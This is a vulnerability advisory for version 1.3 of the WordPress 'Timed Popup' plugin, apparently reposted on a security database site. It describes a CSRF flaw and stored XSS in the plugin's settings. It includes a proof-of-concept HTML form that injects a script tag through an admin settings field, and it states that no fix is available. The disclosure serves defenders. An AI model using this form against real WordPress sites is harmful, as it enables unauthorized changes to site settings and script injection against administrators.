WordPress Timed Popup 1.3 CSRF / XSS

2014-12-13 / 2015-04-19
Credit: Morten
Risk: Medium
Local: No
Remote: Yes


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Title: WordPress 'Timed Popup' plugin - CSRF/XSS Version: 1.3 Author: Morten N?rtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/wp-timed-popup/ Notified WordPress: 2014/11/27 ---------------------------------------------------------------- ## Description: ---------------------------------------------------------------- WordPress popup is a timed popup box that shows up on your website, and can be used as a call to action to display products, sign up for newsletters, and mainly to get the attention of your website visitors in an appealing and non-intrusive manner. It has an options page which easily allows you to change the title, text, link and allows you to integrate your existing form or newsletter form with Shotcode support. You can easily connect your mailchimp, gravity forms, contact form 7 shortcodes and get subsribers! ## CSRF: ---------------------------------------------------------------- It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ---------------------------------------------------------------- Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin and then submit the following form. <form method="POST" action="http://[DOMAIN]/wp-admin/options-general.php?page=wp-popup.php"> <input type="text" name="sc_popup_subtitle" value="</textarea><script>alert(1)</script>"><br /> <input type="text" name="wp_popup_save" value="Update"><br /> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- No fix available.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top